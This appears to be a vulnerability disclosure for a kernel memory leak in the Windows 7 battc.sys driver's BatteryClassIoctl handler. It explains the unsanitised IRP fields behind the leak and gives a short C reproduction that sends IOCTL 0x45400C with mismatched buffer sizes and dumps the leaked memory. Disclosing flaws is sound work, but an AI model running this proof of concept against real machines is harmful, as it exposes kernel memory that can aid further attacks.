BATTC.SYS!BatteryClassIoctl Kernel Memory Disclosure

1. Description
2. Battc.sys is prone to kernel memory disclosure when the "BatteryClassIoctl" function processes IO Control Code 0x45400C. By calling the "ntdll!ZwDeviceIoControlFile" function on device "\device\compositebattery" with the "InputBufferLength" parameter set to a value much less than that of the "OutputBufferLength" parameter, we cause the "nt!IopCompleteRequest" function to leak data to the output buffer. This is due "BatteryClassIoctl" function not sanitizing  
3.  
4. pIRP->IoStatus.Information and
5.  
6. pIRP->Tail.Overlay.CurrentStackLocation.Parameters.DeviceIoControl.OutputBufferLength and  
7.  
8. pIRP->AssociatedIrp.SystemBuffer
9.  
10. .
11.  
12. ---- Reproduced as follows ---------------
13.  
14.     memset(pIn,0xCC,0x1000);
15.  
16.     memset(pOut,0xCC,0x1000);
17.  
18. _IO_STATUS_BLOCK IOB={0};
19.  
20.     ulong IoCode = 0x45400C;
21.  
22.  
23. ulong InSize = 0x10;
24.  
25. ulong OutSize = 0x1000;//increase this value to disclose more
26.  
27. printf("InSize: %X, OutSize: %X\r\n",InSize,OutSize);
28.  
29. int ret = ZwDeviceIoControlFile(hDevice,
30.                             0 /*hEVent*/,
31.                             0 /*ApcRoutine*/,
32.                             0 /*ApcContext*/,
33.                             &IOB,
34.                             IoCode,
35.                             pIn,
36.                             InSize,
37.                             pOut,
38.                             OutSize);
39.  
40. printf("ZwDeviceIoControlFile, ret: %X\r\n",ret);
41. DumpHex_8(pOut,0x1000);
42. //------------------------------------
43.  
44. Vulnerable file version: 6.1.7600.16385
45.  
46. Test on Windows 7-64Bit SP1